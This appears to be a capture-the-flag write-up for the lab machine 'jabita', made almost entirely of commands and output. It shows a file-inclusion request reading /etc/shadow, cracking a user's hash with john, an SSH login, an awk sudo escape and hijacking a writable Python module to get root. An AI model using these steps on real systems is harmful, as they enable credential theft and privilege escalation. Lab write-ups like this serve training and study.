jabita Fri, Sep 09, 2022 GET /building/index.php?page=/etc/shadow HTTP/1.1 LOL ┌──(root💀kali)-[/opt/hmv/jabita] └─# john hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status joaninha (jack) 1g 0:00:00:02 DONE (2022-09-09 07:16) 0.4347g/s 1669p/s 1669c/s 1669C/s energy..dodgers Use the "--show" option to display all of the cracked passwords reliably Session completed. ┌──(root💀kali)-[/opt/hmv/jabita] └─# ssh jack@10.10.10.123 The authenticity of host '10.10.10.123 (10.10.10.123)' cant be established. ED25519 key fingerprint is SHA256:Sxz30elYyqNibTrCsnd7Xa6CrZ6qllyKNc+LfOMtZSo. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.123' (ED25519) to the list of known hosts. jack@10.10.10.123s password: Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-47-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Sep 5 01:40:05 PM UTC 2022 System load: 0.4404296875 Processes: 111 Usage of /: 51.4% of 9.75GB Users logged in: 0 Memory usage: 21% IPv4 address for enp0s3: 192.163.0.112 Swap usage: 0% 6 updates can be applied immediately. 3 of these updates are standard security updates. To see these additional updates run: apt list --upgradable Last login: Mon Sep 5 12:01:58 2022 from 192.163.0.90 jack@jabita:~$ sudo -l Matching Defaults entries for jack on jabita: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never User jack may run the following commands on jabita: (jaba : jaba) NOPASSWD: /usr/bin/awk jack@jabita:~$ sudo -u jaba /usr/bin/awk 'BEGIN {system("/bin/sh")}' $ id uid=1002(jaba) gid=1002(jaba) groups=1002(jaba) $ bash jaba@jabita:~$ jaba@jabita:/$ sudo -l Matching Defaults entries for jaba on jabita: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never User jaba may run the following commands on jabita: (root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py jaba@jabita:/$ cat /usr/bin/clean.py import wild wild.first() jaba@jabita:/$ cd / jaba@jabita:/$ find . -name wild.py 2>/dev/null ./usr/lib/python3.10/wild.py Let’s see jaba@jabita:/$ ls -lash /usr/lib/python3.10/ | grep wild 4.0K -rw-r--rw- 1 root root 29 Sep 5 12:48 wild.py Write access jaba@jabita:/$ printf 'import os;os.system("/bin/bash")\n' > /usr/lib/python3.10/wild.py jaba@jabita:/$ sudo -u root /usr/bin/python3 /usr/bin/clean.py root@jabita:/# id uid=0(root) gid=0(root) groups=0(root) root@jabita:/#